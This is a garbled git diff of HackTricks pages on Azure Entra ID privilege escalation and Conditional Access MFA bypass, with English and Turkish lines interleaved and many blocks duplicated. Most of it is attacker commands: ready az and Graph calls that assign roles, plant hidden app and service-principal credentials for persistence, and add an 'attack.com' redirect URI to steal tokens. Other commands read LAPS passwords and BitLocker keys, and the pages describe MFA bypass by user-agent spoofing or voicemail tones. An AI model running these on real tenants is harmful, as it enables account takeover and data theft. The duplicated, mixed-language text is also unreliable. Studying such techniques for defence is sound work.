--uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"
--uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"
```
- Add more permissions to a role:
- Bir role daha fazla izin ekleyin:
```bash
# List only custom roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'
# Change the permissions of a custom role
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \
--headers "Content-Type=application/json" \
--body '{
"description": "Update basic properties of application registrations",
"rolePermissions": [
{
"allowedResourceActions": [
"microsoft.directory/applications/credentials/update"
]
}
]
}'
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \
--headers "Content-Type=application/json" \
--body '{
"description": "Update basic properties of application registrations",
"rolePermissions": [
{
"allowedResourceActions": [
"microsoft.directory/applications/credentials/update"
]
}
]
}'
```
## Applications
## Uygulamalar
### `microsoft.directory/applications/credentials/update`
This allows an attacker to **add credentials** (passwords or certificates) to existing applications. If the application has privileged permissions, the attacker can authenticate as that application and gain those privileges.
Bu, bir saldırgana mevcut uygulamalara **kimlik bilgileri** (şifreler veya sertifikalar) ekleme imkanı tanır. Uygulama ayrıcalıklı izinlere sahipse, saldırgan o uygulama olarak kimlik doğrulaması yapabilir ve bu ayrıcalıkları elde edebilir.
```bash
# Generate a new password without overwritting old ones
az ad app credential reset --id <appId> --append
# Generate a new certificate without overwritting old ones
az ad app credential reset --id <appId> --create-cert
```
### `microsoft.directory/applications.myOrganization/credentials/update`
This allows the same actions as `applications/credentials/update`, but scoped to single-directory applications.
Bu, `applications/credentials/update` ile aynı eylemleri sağlar, ancak tek dizin uygulamaları için kapsamlıdır.
```bash
az ad app credential reset --id <appId> --append
```
### `microsoft.directory/applications/owners/update`
By adding themselves as an owner, an attacker can manipulate the application, including credentials and permissions.
Kendilerini bir sahip olarak ekleyerek, bir saldırgan uygulamayı, kimlik bilgileri ve izinler dahil olmak üzere manipüle edebilir.
```bash
az ad app owner add --id <AppId> --owner-object-id <UserId>
az ad app credential reset --id <appId> --append
@@ -84,78 +75,66 @@ az ad app credential reset --id <appId> --append
# You can check the owners with
az ad app owner list --id <appId>
```
### `microsoft.directory/applications/allProperties/update`
An attacker can add a redirect URI to applications that are being used by users of the tenant and then share with them login URLs that use the new redirect URL in order to steal their tokens. Note that if the user was already logged in the application, the authentication is going to be automatic without the user needing to accept anything.
Note that it's also possible to change the permissions the application requests in order to get more permissions, but in this case the user will need accept again the prompt asking for all the permissions.
Bir saldırgan, kiracının kullanıcıları tarafından kullanılan uygulamalara bir yönlendirme URI'si ekleyebilir ve ardından bu yeni yönlendirme URL'sini kullanan oturum açma URL'lerini onlarla paylaşarak token'larını çalabilir. Kullanıcının zaten uygulamada oturum açmış olması durumunda, kimlik doğrulama otomatik olacak ve kullanıcının herhangi bir şeyi kabul etmesine gerek kalmayacaktır.
Ayrıca, uygulamanın talep ettiği izinleri değiştirmek ve daha fazla izin almak da mümkündür, ancak bu durumda kullanıcının tüm izinleri isteyen istemi tekrar kabul etmesi gerekecektir.
```bash
# Get current redirect uris
az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris"
# Add a new redirect URI (make sure to keep the configured ones)
az ad app update --id <app-id> --web-redirect-uris "https://original.com/callback https://attack.com/callback"
```
## Service Principals
### `microsoft.directory/servicePrincipals/credentials/update`
This allows an attacker to add credentials to existing service principals. If the service principal has elevated privileges, the attacker can assume those privileges.
Bu, bir saldırganın mevcut hizmet ilkelerine kimlik bilgileri eklemesine olanak tanır. Eğer hizmet ilkesi yükseltilmiş ayrıcalıklara sahipse, saldırgan bu ayrıcalıkları üstlenebilir.
```bash
az ad sp credential reset --id <sp-id> --append
```
> [!CAUTION]
> The new generated password won't appear in the web console, so this could be a stealth way to maintain persistence over a service principal.\
> From the API they can be found with: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json`
If you get the error `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` it's because **it's not possible to modify the passwordCredentials property** of the SP and first you need to unlock it. For it you need a permission (`microsoft.directory/applications/allProperties/update`) that allows you to execute:
> Yeni oluşturulan şifre web konsolunda görünmeyecek, bu nedenle bu, bir hizmet ilkesinde kalıcılığı sürdürmenin gizli bir yolu olabilir.\
> API'den şu şekilde bulunabilir: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json`
Eğer `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` hatasını alıyorsanız, bunun nedeni **SP'nin passwordCredentials özelliğini değiştirmenin mümkün olmamasıdır** ve önce onu kilidini açmanız gerekir. Bunun için, şunu çalıştırmanıza izin veren bir izne ihtiyacınız var (`microsoft.directory/applications/allProperties/update`):
```bash
az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/<sp-object-id> --body '{"servicePrincipalLockConfiguration": null}'
```
### `microsoft.directory/servicePrincipals/synchronizationCredentials/manage`
This allows an attacker to add credentials to existing service principals. If the service principal has elevated privileges, the attacker can assume those privileges.
Bu, bir saldırganın mevcut hizmet ilkelerine kimlik bilgileri eklemesine olanak tanır. Eğer hizmet ilkesi yükseltilmiş ayrıcalıklara sahipse, saldırgan bu ayrıcalıkları üstlenebilir.
```bash
az ad sp credential reset --id <sp-id> --append
```
### `microsoft.directory/servicePrincipals/owners/update`
Similar to applications, this permission allows to add more owners to a service principal. Owning a service principal allows control over its credentials and permissions.
Uygulamalara benzer şekilde, bu izin bir hizmet ilkesine daha fazla sahip eklemeye olanak tanır. Bir hizmet ilkesine sahip olmak, onun kimlik bilgileri ve izinleri üzerinde kontrol sağlar.
```bash
# Add new owner
spId="<spId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"
az ad sp credential reset --id <sp-id> --append
# You can check the owners with
az ad sp owner list --id <spId>
```
> [!CAUTION]
> After adding a new owner, I tried to remove it but the API responded that the DELETE method wasn't supported, even if it's the method you need to use to delete the owner. So you **can't remove owners nowadays**.
> Yeni bir sahip ekledikten sonra, onu kaldırmaya çalıştım ama API, DELETE yönteminin desteklenmediğini yanıtladı, bu yöntem sahibi silmek için kullanmanız gereken yöntemdir. Yani **günümüzde sahipleri kaldıramazsınız**.
### `microsoft.directory/servicePrincipals/disable` and `enable`
### `microsoft.directory/servicePrincipals/disable` ve `enable`
These permissions allows to disable and enable service principals. An attacker could use this permission to enable a service principal he could get access to somehow to escalate privileges.
Note that for this technique the attacker will need more permissions in order to take over the enabled service principal.
Bu izinler, hizmet ilkelerini devre dışı bırakma ve etkinleştirme olanağı sağlar. Bir saldırgan, ayrıcalıkları artırmak için erişim sağlayabileceği bir hizmet ilkesini etkinleştirmek için bu izni kullanabilir.
Bu teknik için saldırganın etkinleştirilen hizmet ilkesini ele geçirmek için daha fazla izne ihtiyacı olacağını unutmayın.
```bash
bashCopy code# Disable
az ad sp update --id <ServicePrincipalId> --account-enabled false
@@ -163,11 +142,9 @@ az ad sp update --id <ServicePrincipalId> --account-enabled false
# Enable
az ad sp update --id <ServicePrincipalId> --account-enabled true
```
#### `microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials` & `microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials`
These permissions allow to create and get credentials for single sign-on which could allow access to third-party applications.
Bu izinler, üçüncü taraf uygulamalara erişim sağlayabilecek tek oturum açma için kimlik bilgileri oluşturma ve alma yetkisi verir.
```bash
# Generate SSO creds for a user or a group
spID="<spId>"
@@ -175,176 +152,155 @@ user_or_group_id="<id>"
username="<username>"
password="<password>"
az rest --method POST \
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"
# Get credentials of a specific credID
credID="<credID>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$credID\"}"
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$credID\"}"
```
---
## Groups
## Gruplar
### `microsoft.directory/groups/allProperties/update`
This permission allows to add users to privileged groups, leading to privilege escalation.
Bu izin, kullanıcıları ayrıcalıklı gruplara eklemeye olanak tanır ve bu da ayrıcalık yükselmesine yol açar.
```bash
az ad group member add --group <GroupName> --member-id <UserId>
```
**Note**: This permission excludes Entra ID role-assignable groups.
**Not**: Bu izin, Entra ID rol atanabilir gruplarını hariç tutar.
### `microsoft.directory/groups/owners/update`
This permission allows to become an owner of groups. An owner of a group can control group membership and settings, potentially escalating privileges to the group.
Bu izin, grupların sahibi olmayı sağlar. Bir grubun sahibi, grup üyeliğini ve ayarlarını kontrol edebilir, bu da potansiyel olarak grubun ayrıcalıklarını artırabilir.
```bash
az ad group owner add --group <GroupName> --owner-object-id <UserId>
az ad group member add --group <GroupName> --member-id <UserId>
```
**Note**: This permission excludes Entra ID role-assignable groups.
**Not**: Bu izin, Entra ID rol atama gruplarını hariç tutar.
### `microsoft.directory/groups/members/update`
This permission allows to add members to a group. An attacker could add himself or malicious accounts to privileged groups can grant elevated access.
Bu izin, bir gruba üye eklemeye olanak tanır. Bir saldırgan, kendisini veya kötü niyetli hesapları ayrıcalıklı gruplara ekleyerek yükseltilmiş erişim sağlayabilir.
```bash
az ad group member add --group <GroupName> --member-id <UserId>
```
### `microsoft.directory/groups/dynamicMembershipRule/update`
This permission allows to update membership rule in a dynamic group. An attacker could modify dynamic rules to include himself in privileged groups without explicit addition.
Bu izin, dinamik bir gruptaki üyelik kuralını güncellemeye olanak tanır. Bir saldırgan, kendisini ayrı bir ekleme olmadan ayrıcalıklı gruplara dahil etmek için dinamik kuralları değiştirebilir.
```bash
groupId="<group-id>"
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
--headers "Content-Type=application/json" \
--body '{
"membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
"membershipRuleProcessingState": "On"
}'
--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
--headers "Content-Type=application/json" \
--body '{
"membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
"membershipRuleProcessingState": "On"
}'
```
**Not**: Bu izin, Entra ID rol atanabilir gruplarını hariç tutar.
**Note**: This permission excludes Entra ID role-assignable groups.
### Dinamik Gruplar Privesc
### Dynamic Groups Privesc
It might be possible for users to escalate privileges modifying their own properties to be added as members of dynamic groups. For more info check:
Kullanıcıların, dinamik gruplara üye olarak eklenmek için kendi özelliklerini değiştirmesiyle yetkileri artırması mümkün olabilir. Daha fazla bilgi için kontrol edin:
{{#ref}}
dynamic-groups.md
{{#endref}}
## Users
## Kullanıcılar
### `microsoft.directory/users/password/update`
This permission allows to reset password to non-admin users, allowing a potential attacker to escalate privileges to other users. This permission cannot be assigned to custom roles.
Bu izin, yönetici olmayan kullanıcıların şifresini sıfırlamaya olanak tanır ve potansiyel bir saldırganın diğer kullanıcılara yetki artırmasına olanak sağlar. Bu izin özel rollere atanamaz.
```bash
az ad user update --id <user-id> --password "kweoifuh.234"
```
### `microsoft.directory/users/basic/update`
This privilege allows to modify properties of the user. It's common to find dynamic groups that add users based on properties values, therefore, this permission could allow a user to set the needed property value to be a member to a specific dynamic group and escalate privileges.
Bu ayrıcalık, kullanıcının özelliklerini değiştirmeye olanak tanır. Özellik değerlerine dayalı olarak kullanıcı ekleyen dinamik grupların bulunması yaygındır, bu nedenle bu izin, bir kullanıcının belirli bir dinamik grup üyesi olmak için gerekli özellik değerini ayarlamasına ve ayrıcalıkları artırmasına olanak tanıyabilir.
```bash
#e.g. change manager of a user
victimUser="<userID>"
managerUser="<userID>"
az rest --method PUT \
--uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'
--uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'
#e.g. change department of a user
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
--headers "Content-Type=application/json" \
--body "{\"department\": \"security\"}"
--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
--headers "Content-Type=application/json" \
--body "{\"department\": \"security\"}"
```
## Koşullu Erişim Politikaları & MFA atlatma
## Conditional Access Policies & MFA bypass
Misconfigured conditional access policies requiring MFA could be bypassed, check:
Yanlış yapılandırılmış MFA gerektiren koşullu erişim politikaları atlatılabilir, kontrol edin:
{{#ref}}
az-conditional-access-policies-mfa-bypass.md
{{#endref}}
## Devices
## Cihazlar
### `microsoft.directory/devices/registeredOwners/update`
This permission allows attackers to assigning themselves as owners of devices to gain control or access to device-specific settings and data.
Bu izin, saldırganların kendilerini cihazların sahibi olarak atamalarına ve cihazlara özgü ayar ve verilere erişim sağlamalarına olanak tanır.
```bash
deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'
```
### `microsoft.directory/devices/registeredUsers/update`
This permission allows attackers to associate their account with devices to gain access or to bypass security policies.
Bu izin, saldırganların hesaplarını cihazlarla ilişkilendirmesine olanak tanır, böylece erişim elde edebilir veya güvenlik politikalarını atlayabilirler.
```bash
deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'
```
### `microsoft.directory/deviceLocalCredentials/password/read`
This permission allows attackers to read the properties of the backed up local administrator account credentials for Microsoft Entra joined devices, including the password
Bu izin, saldırganların Microsoft Entra'ya katılan cihazlar için yedeklenmiş yerel yönetici hesap kimlik bilgilerini, şifre de dahil olmak üzere, okumalarına olanak tanır.
```bash
# List deviceLocalCredentials
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"
# Get credentials
deviceLC="<deviceLCID>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \
```
## BitlockerKeys
### `microsoft.directory/bitlockerKeys/key/read`
This permission allows to access BitLocker keys, which could allow an attacker to decrypt drives, compromising data confidentiality.
Bu izin, BitLocker anahtarlarına erişim sağlar; bu da bir saldırganın sürücüleri şifrelerini çözmesine ve veri gizliliğini tehlikeye atmasına olanak tanıyabilir.
```bash
# List recovery keys
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"
# Get key
recoveryKeyId="<recoveryKeyId>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"
```
## Other Interesting permissions (TODO)
## Diğer İlginç İzinler (TODO)
- `microsoft.directory/applications/permissions/update`
- `microsoft.directory/servicePrincipals/permissions/update`
@@ -355,7 +311,3 @@ az rest --method GET \
- `microsoft.directory/applications.myOrganization/permissions/update`
{{#include ../../../../banners/hacktricks-training.md}}

134
src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
View File

@@ -1,93 +1,90 @@
# Az - Conditional Access Policies & MFA Bypass
# Az - Koşullu Erişim Politikaları & MFA Atlatma
{{#include ../../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
Azure Conditional Access policies are rules set up in Microsoft Azure to enforce access controls to Azure services and applications based on certain **conditions**. These policies help organizations secure their resources by applying the right access controls under the right circumstances.\
Conditional access policies basically **defines** **Who** can access **What** from **Where** and **How**.
Azure Koşullu Erişim politikaları, belirli **koşullara** dayalı olarak Azure hizmetlerine ve uygulamalarına erişim kontrollerini uygulamak için Microsoft Azure'da kurulan kurallardır. Bu politikalar, organizasyonların doğru koşullar altında doğru erişim kontrollerini uygulayarak kaynaklarını güvence altına almasına yardımcı olur.\
Koşullu erişim politikaları esasen **Kim**'in **Neyi** **Nereden** ve **Nasıl** erişebileceğini **tanımlar**.
Here are a couple of examples:
İşte birkaç örnek:
1. **Sign-In Risk Policy**: This policy could be set to require multi-factor authentication (MFA) when a sign-in risk is detected. For example, if a user's login behavior is unusual compared to their regular pattern, such as logging in from a different country, the system can prompt for additional authentication.
2. **Device Compliance Policy**: This policy can restrict access to Azure services only to devices that are compliant with the organization's security standards. For instance, access could be allowed only from devices that have up-to-date antivirus software or are running a certain operating system version.
1. **Oturum Açma Risk Politikası**: Bu politika, bir oturum açma riski tespit edildiğinde çok faktörlü kimlik doğrulama (MFA) gerektirecek şekilde ayarlanabilir. Örneğin, bir kullanıcının oturum açma davranışı, farklı bir ülkeden oturum açmak gibi, normal desenine kıyasla alışılmadık olduğunda, sistem ek kimlik doğrulama talep edebilir.
2. **Cihaz Uygunluk Politikası**: Bu politika, yalnızca organizasyonun güvenlik standartlarına uygun cihazlara Azure hizmetlerine erişimi kısıtlayabilir. Örneğin, yalnızca güncel antivirüs yazılımına sahip veya belirli bir işletim sistemi sürümünü çalıştıran cihazlardan erişime izin verilebilir.
## Conditional Acces Policies Bypasses
## Koşullu Erişim Politikası Atlatmaları
It's possible that a conditional access policy is **checking some information that can be easily tampered allowing a bypass of the policy**. And if for example the policy was configuring MFA, the attacker will be able to bypass it.
Bir koşullu erişim politikasının **kolayca manipüle edilebilecek bazı bilgileri kontrol etmesi mümkündür, bu da politikanın atlatılmasına olanak tanır**. Örneğin, politika MFA'yı yapılandırıyorsa, saldırgan bunu atlatabilecektir.
When configuring a conditional access policy it's needed to indicate the **users** affected and **target resources** (like all cloud apps).
Bir koşullu erişim politikası yapılandırırken, etkilenen **kullanıcıları** ve **hedef kaynakları** (tüm bulut uygulamaları gibi) belirtmek gerekir.
It's also needed to configure the **conditions** that will **trigger** the policy:
Ayrıca, politikayı **tetikleyecek** **koşulları** yapılandırmak da gereklidir:
- **Network**: Ip, IP ranges and geographical locations
- Can be bypassed using a VPN or Proxy to connect to a country or managing to login from an allowed IP address
- **Microsoft risks**: User risk, Sign-in risk, Insider risk
- **Device platforms**: Any device or select Android, iOS, Windows phone, Windows, macOS, Linux
- If “Any device” is not selected but all the other options are selected its possible to bypass it using a random user-agent not related to those platforms
- **Client apps**: Option are “Browser”, “Mobiles apps and desktop clients”, “Exchange ActiveSync clients” and Other clients
- To bypass login with a not selected option
- **Filter for devices**: Its possible to generate a rule related the used device
- A**uthentication flows**: Options are “Device code flow” and “Authentication transfer”
- This wont affect an attacker unless he is trying to abuse any of those protocols in a phishing attempt to access the victims account
- ****: IP, IP aralıkları ve coğrafi konumlar
- Bir VPN veya Proxy kullanarak bir ülkeye bağlanarak veya izin verilen bir IP adresinden oturum açarak atlatılabilir
- **Microsoft riskleri**: Kullanıcı riski, Oturum açma riski, İçeriden gelen risk
- **Cihaz platformları**: Herhangi bir cihaz veya Android, iOS, Windows Phone, Windows, macOS, Linux seçilebilir
- “Herhangi bir cihaz” seçilmediğinde ancak diğer tüm seçenekler seçildiğinde, bu platformlarla ilgili olmayan rastgele bir kullanıcı aracını kullanarak atlatmak mümkündür
- **İstemci uygulamaları**: Seçenekler “Tarayıcı”, “Mobil uygulamalar ve masaüstü istemcileri”, “Exchange ActiveSync istemcileri” ve “Diğer istemciler
- Seçilmeyen bir seçenekle oturum açmayı atlatmak için
- **Cihazlar için filtre**: Kullanılan cihaza ilişkin bir kural oluşturmak mümkündür
- **Kimlik doğrulama akışları**: Seçenekler “Cihaz kodu akışı” ve “Kimlik doğrulama transferi
- Bu, bir saldırganı etkilemeyecektir, yalnızca bu protokollerden herhangi birini bir kimlik avı girişiminde kurbanın hesabına erişmek için kötüye kullanmaya çalışıyorsa
The possible **results** are: Block or Grant access with potential conditions like require MFA, device to be compliant…
Olası **sonuçlar**: Erişimi engelle veya MFA gerektirmek, cihazın uygun olmasını sağlamak gibi potansiyel koşullarla erişim izni ver.
### Device Platforms - Device Condition
### Cihaz Platformları - Cihaz Koşulu
It's possible to set a condition based on the **device platform** (Android, iOS, Windows, macOS...), however, this is based on the **user-agent** so it's easy to bypass. Even **making all the options enforce MFA**, if you use a **user-agent that it isn't recognized,** you will be able to bypass the MFA or block:
**Cihaz platformuna** (Android, iOS, Windows, macOS...) dayalı bir koşul ayarlamak mümkündür, ancak bu **kullanıcı aracına** dayandığıin atlatmak kolaydır. Tüm seçenekleri MFA'yı zorlamak için ayarlasanız bile, **tanınmayan bir kullanıcı aracı** kullanırsanız, MFA'yı veya engellemeyi atlatabilirsiniz:
<figure><img src="../../../../images/image (352).png" alt=""><figcaption></figcaption></figure>
Just making the browser **send an unknown user-agent** (like `Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) UCBrowser/10.1.0.563 Mobile`) is enough to not trigger this condition.\
You can change the user agent **manually** in the developer tools:
Tarayıcının **bilinmeyen bir kullanıcı aracı göndermesini sağlamak** (örneğin `Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) UCBrowser/10.1.0.563 Mobile`) bu koşulu tetiklememek için yeterlidir.\
Kullanıcı aracını **manuel olarak** geliştirici araçlarında değiştirebilirsiniz:
<figure><img src="../../../../images/image (351).png" alt="" width="375"><figcaption></figcaption></figure>
&#x20;Or use a [browser extension like this one](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en).
&#x20;Ya da [bunun gibi bir tarayıcı uzantısı](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en) kullanabilirsiniz.
### Locations: Countries, IP ranges - Device Condition
### Konumlar: Ülkeler, IP aralıkları - Cihaz Koşulu
If this is set in the conditional policy, an attacker could just use a **VPN** in the **allowed country** or try to find a way to access from an **allowed IP address** to bypass these conditions.
Bu koşullu politikada ayarlandığında, bir saldırgan sadece **izin verilen ülkede** bir **VPN** kullanabilir veya bu koşulları atlatmak için **izin verilen bir IP adresinden** erişim sağlamanın bir yolunu bulmaya çalışabilir.
### Cloud Apps
### Bulut Uygulamaları
It's possible to configure **conditional access policies to block or force** for example MFA when a user tries to access **specific app**:
Bir kullanıcı **belirli bir uygulamaya** erişmeye çalıştığında, örneğin MFA'yı engellemek veya zorlamak için **koşullu erişim politikaları** yapılandırmak mümkündür:
<figure><img src="../../../../images/image (353).png" alt=""><figcaption></figcaption></figure>
To try to bypass this protection you should see if you can **only into any application**.\
The tool [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) has **tens of application IDs hardcoded** and will try to login into them and let you know and even give you the token if successful.
In order to **test specific application IDs in specific resources** you could also use a tool such as:
Bu korumayı atlatmaya çalışmak için, **sadece herhangi bir uygulamaya** erişip erişemeyeceğinizi kontrol etmelisiniz.\
[**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) aracı, **yüzlerce uygulama kimliği kodlanmış** ve bunlara giriş yapmaya çalışacak, başarılı olursa size token verecektir.
**Belirli kaynaklarda belirli uygulama kimliklerini test etmek** için ayrıca şu aracı kullanabilirsiniz:
```bash
roadrecon auth -u user@email.com -r https://outlook.office.com/ -c 1fec8e78-bce4-4aaf-ab1b-5451cc387264 --tokens-stdout
<token>
```
Ayrıca, giriş yöntemini korumak da mümkündür (örneğin, tarayıcıdan veya masaüstü uygulamasından giriş yapmaya çalışıyorsanız). Araç [**Invoke-MFASweep**](az-conditional-access-policies-mfa-bypass.md#invoke-mfasweep) bu korumaları aşmaya çalışmak için bazı kontroller gerçekleştirir.
Moreover, it's also possible to protect the login method (e.g. if you are trying to login from the browser or from a desktop application). The tool [**Invoke-MFASweep**](az-conditional-access-policies-mfa-bypass.md#invoke-mfasweep) perform some checks to try to bypass this protections also.
Araç [**donkeytoken**](az-conditional-access-policies-mfa-bypass.md#donkeytoken) benzer amaçlar için kullanılabilir, ancak bakımsız görünüyor.
The tool [**donkeytoken**](az-conditional-access-policies-mfa-bypass.md#donkeytoken) could also be used to similar purposes although it looks unmantained.
Araç [**ROPCI**](https://github.com/wunderwuzzi23/ropci) bu korumaları test etmek ve MFA'ları veya engelleri aşmanın mümkün olup olmadığını görmek için de kullanılabilir, ancak bu araç **beyaz kutu** perspektifinden çalışır. Öncelikle kiracıda izin verilen Uygulamalar listesini indirmeniz gerekir ve ardından bunlara giriş yapmaya çalışacaktır.
The tool [**ROPCI**](https://github.com/wunderwuzzi23/ropci) can also be used to test this protections and see if it's possible to bypass MFAs or blocks, but this tool works from a **whitebox** perspective. You first need to download the list of Apps allowed in the tenant and then it will try to login into them.
## Diğer Az MFA Aşmaları
## Other Az MFA Bypasses
### Zil sesi
### Ring tone
One Azure MFA option is to **receive a call in the configured phone number** where it will be asked the user to **send the char `#`**.
Bir Azure MFA seçeneği, **yapılandırılmış telefon numarasına bir çağrı almak** ve kullanıcıdan **`#` karakterini göndermesini istemektir**.
> [!CAUTION]
> As chars are just **tones**, an attacker could **compromise** the **voicemail** message of the phone number, configure as the message the **tone of `#`** and then, when requesting the MFA make sure that the **victims phone is busy** (calling it) so the Azure call gets redirected to the voice mail.
> Karakterler sadece **tonlar** olduğundan, bir saldırgan **telefon numarasının** **sesli mesajını ele geçirebilir**, mesaj olarak **`#` tonunu** yapılandırabilir ve ardından MFA talep edildiğinde **kurbanın telefonunun meşgul olduğundan emin olabilir** (aramak suretiyle) böylece Azure çağrısı sesli mesaja yönlendirilir.
### Compliant Devices
### Uyumlu Cihazlar
Policies often asks for a compliant device or MFA, so an **attacker could register a compliant device**, get a **PRT** token and **bypass this way the MFA**.
Start by registering a **compliant device in Intune**, then **get the PRT** with:
Politikalar genellikle uyumlu bir cihaz veya MFA talep eder, bu nedenle bir **saldırgan uyumlu bir cihaz kaydedebilir**, bir **PRT** token alabilir ve **bu şekilde MFA'yı aşabilir**.
Öncelikle **Intune'da uyumlu bir cihaz kaydederek** başlayın, ardından **PRT'yi** almak için:
```powershell
$prtKeys = Get-AADIntuneUserPRTKeys - PfxFileName .\<uuid>.pfx -Credentials $credentials
@@ -97,89 +94,72 @@ Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken
<token returned>
```
Find more information about this kind of attack in the following page:
Daha fazla bilgi için bu tür bir saldırı hakkında aşağıdaki sayfayı inceleyin:
{{#ref}}
../../az-lateral-movement-cloud-on-prem/pass-the-prt.md
{{#endref}}
## Tooling
## Araçlar
### [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep)
This script get some user credentials and check if it can login in some applications.
Bu script bazı kullanıcı kimlik bilgilerini alır ve bazı uygulamalara giriş yapıp yapamayacağını kontrol eder.
This is useful to see if you **aren't required MFA to login in some applications** that you might later abuse to **escalate pvivileges**.
Bu, bazı uygulamalara giriş yapmak için **MFA gerekmiyorsa** bunu görmek için yararlıdır; bu uygulamaları daha sonra **yetki yükseltmek** için kötüye kullanabilirsiniz.
